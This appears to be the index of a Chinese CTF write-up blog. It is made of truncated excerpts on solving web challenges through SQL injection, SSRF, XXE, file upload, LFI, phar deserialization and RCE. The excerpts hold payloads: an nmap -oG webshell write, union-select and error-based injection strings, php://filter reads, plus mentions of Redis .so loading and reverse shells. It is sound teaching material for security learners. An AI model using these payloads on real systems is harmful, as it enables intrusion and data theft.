Ho1aAs‘s Blog

@[toc]# 利用点 - nmap写文件 - escapeshellarg() + escapeshellcmd()使用不当# Payload```[GET]http://URL/?host='<?php eval($_POST[a]);?> -oG 1.php '```

# 利用点 - php5 script风格标签

# 利用点 - base64 + filter协议绕过死亡exit

# 利用点 - 综合利用魔术方法反序列化

# 利用点 - 过滤select使用handler查表

# 利用点 - 上传htaccess解析png马

文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完利用点反序列化绕过wakeupRedis加载恶意so获取shell源码<?phpclass A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code

[第三届第五空间网络安全大赛]PNG图⽚转换器；利用点： Ruby File.open()命令执行

利用点：任意文件读取；phar反序列化POP链读取文件；绕过MIME文件上传；任意文件删除；phar://协议触发反序列化

特点：自动化python脚本获取flag；利用点：unserialize反序列化；phar反序列化；添加图片头和更改MIME、后缀绕过文件上传检测；ssrf gopher协议打php-fpm；绕过open_basedir

利用点：serialize反序列化数组索引整型溢出bypass open_basedirFPM/FastCGI bypass disable_functions反弹shellsuid提权

文章目录利用点代码审计解题完利用点unserialize()反序列化public类变量==弱比较代码审计<?php# 包含flaginclude("flag.php");highlight_file(__FILE__);class FileHandler { # 均是protected变量 protected $op; protected $filename; protected $content; # 构造函数，初始化变量，调用proces

文章目录利用点解题分析完利用点SQL字符型注入UNION SELECT联合查询特性解题search.php的注释发现hint<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->先base32再base64select * from user where username = '$name'明白了查询语句，先试试admi

文章目录利用点解题无利用点SQL注入SSRF读文件解题打开环境，没有任何提示，先试试基础功能，注册一个号，回到主页可以点进去看记录发现URL是拼接上序号的，试试SQL注入，发现是字符型闭合单引号的注入先看看字段数无...

文章目录利用点解题完利用点SQL报错注入SQL空格、等号、截取字符串绕过过滤解题SQL注入，报错显示是字符型注入，闭合单引号check.php?username=a'&password=1过滤了短横线，因此注释符用#check.php?username=a'%23&password=1由于上面有报错信息，尝试报错注入过程中发现，过滤了空格，那么采用括号包裹语句，尝试报错注入check.php?username=a'or(extractvalue(1,conca

文章目录利用点解题完利用点data://伪协议传phpphp://filter伪协议读php反序列化unserialize()解题进入环境，审计代码<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){

文章目录利用点解题原理1原理2完利用点ffifdyop绕过md5($pass, true)SQL注入数组绕过md5解题打开环境只有一个输入框，听闻[BJDCTF2020]出题人喜欢把hint藏在response头老套路了，输入特殊字符串ffifdyop绕过原理1md5加密ffifdyop结果如下<?php echo md5('ffifdyop',true);'or'6�]��!r,��b单引号闭合，or绕过SQL语句接着，进入了一个空白页面，看看源码，发现注释

文章目录利用点解题完利用点字符串绕过is_numeric()科学计数法HTTP请求头解题进入环境，找到pay.php，查看源码发现注释要POST参数money和password，这里对password进行了is_numeric()，常规套路用数字字符串绕过，即404a另一个参数money可从主页上获得，是1000000000这里还有提示，要验证password、money、身份才能获得flag，还差最后一个身份身份这个参数很是模棱两可，不知道是值/字符串，可能是XFF、Refer

文章目录利用点审题解题——Flask session解2——Unicode编码欺骗解3——(非预期)弱口令爆破参考完利用点Flask sessionUnicode编码欺骗（非预期）弱口令爆破审题打开环境，主页仅提供了login和register两项服务，hctf的超链接打开是404提示那么少，先看看主页的源码结合题目以及提示，可以断定是要登录管理员账户，先注册一个账户，看看登录有些什么内容新增了post和change password功能，在change password找到hin

文章目录参考文章题解web373web374~376web377完参考文章一篇文章带你深入理解漏洞之 XXE 漏洞未知攻焉知防——XXE漏洞攻防题解web373常规XXEflag的路径是/flag// 允许加载外部实体libxml_disable_entity_loader(false);// xml文件来源于数据流$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDo

文章目录题解web78web79web80~81web82~86web87web88web116web117完题解LFI：Local File IncludeRFI：Remote File Includeweb78php伪协议，使用php://filter，解码即可[GET]PAYLOAD:?file=php://filter/convert.base64-encode/resource=flag.phpweb79过滤php，data伪协议，使用php://data，上传php代码打开f

文章目录工具题解Web 151~152Web 153Web 154Web 155Web 156Web 157~158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168~170完工具Burpsuitephp题解Web 151~152页面上，伪装成jpg的一句话木马无法上传，提示前后端验证抓包，修改filename为xxx.php，MIME类型image/png读取flag直接用通配符# 151.ph

文章目录题解web 171web 172web 173web 174web 175web 176web 177web 178web 179web 180-182web 183web 184web 185-186web 187web 188web 189web 190完题解web 171基础[GET]PAYLOAD:?id=0' union select 1,2,password from ctfshow_user where username='flag' --+web 172过滤 flag

文章目录前言一、知识点二、题解内网访问伪协议读取文件端口扫描FastCGI协议Redis协议URL Bypass数字IP Bypass302跳转 BypassDNS重绑定Bypass完前言POST请求、上传文件两道题目未解出一、知识点二、题解内网访问伪协议读取文件端口扫描FastCGI协议Redis协议URL Bypass数字IP Bypass302跳转 BypassDNS重绑定Bypass完...

文章目录前言一、知识点Ⅰ、SSRF攻击点Ⅱ、gopher协议二、题解web351web352、353web355web356web358web359web360完前言354和357由于端口改变、服务器所限等原因，无法解出一、知识点Ⅰ、SSRF攻击点<?php$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,

文章目录知识点解题思路完知识点Linux读取文件指令星号通配符文件名作为指令执行解题思路先审计代码猜测是RCE读取当前php，要求指令长度小于4要小于4，只能用nl读取Linux中可以将文件名作为函数和参数，通过星号通配执行先新建一个名称是nl的文件作为指令?1=>nl将右尖括号左侧的内容写入右侧文件，因此相当于新建了一个叫nl的空文件接着读取当前的php，我们预期是执行nl xxx.php，这里由于不知道这个php的名称，无法执行?1=*>z这里的操作是

既然是SQL注入，先测试是字符还是整型?username=admin&password=admin' #You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1报错，将井号编码，成功绕过下一步，联合查询爆出注入点所在处?username=admin

文章目录一、过滤空格的绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag一、过滤空格的绕过一般注入语句为?id=0 union select database(),user()由于过滤了空格致使无法执行注入的语句时，可使用以下字符代替空格，发挥同样效果()：一对圆括号+：加号%09：TAB换行符的URL编码形式/**/：块注释符二、注入过程依次尝试发现只能使用块注释符替换，那么开始注入：Ⅰ、爆表名?id=10/**/union/**/select/**/1,group_conc

文章目录前言——时间盲注一、时间盲注原理时间盲注常用函数二、时间盲注Python脚本脚本使用事项Python3.0-3.7的版本Python3.8+的版本运行截图前言——时间盲注CTFHub_技能树_Web之SQL注入——布尔盲注（含布尔盲注脚本）时间盲注基本思路类似于布尔盲注，细节可以访问上方给出的文章链接，不同的是布尔盲注是通过回显的对错提示来判断是否成功，而时间盲注是通过手动控制页面返回时间来判断是否成功一、时间盲注原理时间盲注常用函数以下是时间盲注常用的SQL语句：if(Bool

文章目录一、报错注入原理报错注入常用函数floor()extractvalue()、updatexml()原理二、注入过程Ⅰ、使用floor()1.查询表名2.查询列名3.查值Ⅱ、使用extractvalue()1.查询表名2.查询列名3.查值Ⅲ、使用updatexml()1.查询表名2.查询列名3.查值一、报错注入原理报错注入，通过运行SQL查询语句，回显查询结果。由于某些函数的神奇操作会使得传入参数先运行，而被报错抛出，能够直接查看参数的运行情况，因而实现查询。报错注入常用函数《代码审计：企业

文章目录前言盲注思路盲注原理盲注常用函数完前言布尔盲注，与普通注入的区别在于“盲注”。在注入语句后，盲注不是返回查询到的结果，而只是返回查询是否成功，即：返回查询语句的布尔值。因此，盲注就是穷举试错，由于只有返回的布尔值，往往查询非常复杂，一般使用脚本来穷举试错盲注思路由于对数据库的信息了解甚少，盲注需要考虑多种情况，一般思路如下：爆数据库名长度根据库名长度爆数据库名对当前数据库爆数据表数量根据表数量爆数据表名长度根据表名长度爆数据表名对所有数据表爆列数量根据列数量爆列名长度根据列

文章目录一、“1024_fastapi”二、“1024_WEB签到”完一、“1024_fastapi”打开环境，提示fastapi对于fastapi，网页会存在自述文档文件/docs，打开发现一个接口提示需要POST参数q执行操作访问/cccalccc由于fastapi基于Python，尝试POST一些简单的有返回值的Python函数运行成功，POST参数q，可以尝试SSTIq=str([].__class__)>>{"res":"<class 'list'>"

文章目录解题思路完解题思路打开环境，先代码审计<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); }

文章目录一、web1~4二、web5~8完一、web1~4·web1代码审计，要求发送GET请求使id参数为1000即可得到flag，然而需要绕过if下的intval()函数，大于999直接报错。由于PHP是弱语言，此处有两种思路：逻辑或：?id=999 or id=1000，?id=999 || id=1000此处intval函数得到的值是999，绕过了判断语句，从而执行sql语句，得到flag加号：?id=999+1利用了弱语言的特性绕过intval，传入sql执行相加得到1000·we

文章目录一、web1~4二、web5~8三、web9~12四、web13~16五、web17~20完一、web1~4·web1flag在HTML注释里，使用F12审查元素或Ctrl+U查看源码·web2flag在HTML注释里，前端js阻止打开F12审查元素，可以进入浏览器界面将环境的URL添加进JavaScript阻止站点后再使用F12审查元素，或是直接Ctrl+U查看源码·web3抓包，flag在包头Header里面·web4访问/robots.txt，找到/flagishere.ph

文章目录解题思路完解题思路此题是绕过正则表达式，先审计代码和匹配的模式<?php highlight_file('2.php');$key='KEY{********************************}';$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);if( $IM ){ die('key is: '.$key);}?&

文章目录一、“Log”二、“Stash”三、“Index”完一、“Log”开启环境使用dirsearch扫描，发现git泄露python dirsearch.py -u <url> -e *使用Githack克隆目录注意，需要python2环境和安装Gitpython2 Githack.py <url>二、“Stash”三、“Index”完欢迎在评论区留言感谢浏览...

文章目录一、“各种绕过”二、“web8”三、“细心”完一、“各种绕过”访问环境，审计代码需要POST$passwd，GET$id和$uname而且passwd和uname需要绕过sha1函数，并且二者值不等，这里考虑数组绕过做法如下：二、“web8”题目提示txt访问环境，先审计代码第二行进行了变量覆盖，需要将文件名赋给$fn，将文件内容赋给$ac，就能获得flag根据提示，尝试访问flag.txt因此直接获得flagflag{3cfb7a90fc0de31}三、“

文章目录一、“never give up”二、“你从哪里来”三、“md5 collision(NUPT_CTF)”四、“程序员本地网站”完一、“never give up”访问环境，查看源码，发现提示网页访问1p.html，发现会跳转到其他网站使用Burp发包访问，得到urlencode内容解码urldecode：<!--var Words ="<script>window.location.href='http://www.bugku.com';</scrip

文章目录解题思路完解题思路打开环境，等待一段时间报错审查源码，发现POST请求，页面也会定时刷新，这里POST了一个函数和变量在hackbar加载URL此处将需要运行的函数赋值给func，参数赋值给p，然后POST在服务器执行那么首先审查网页的php源码highlight_file(index.php)得到源码如下：<!DOCTYPE html><html><head> <title>phpweb</title&g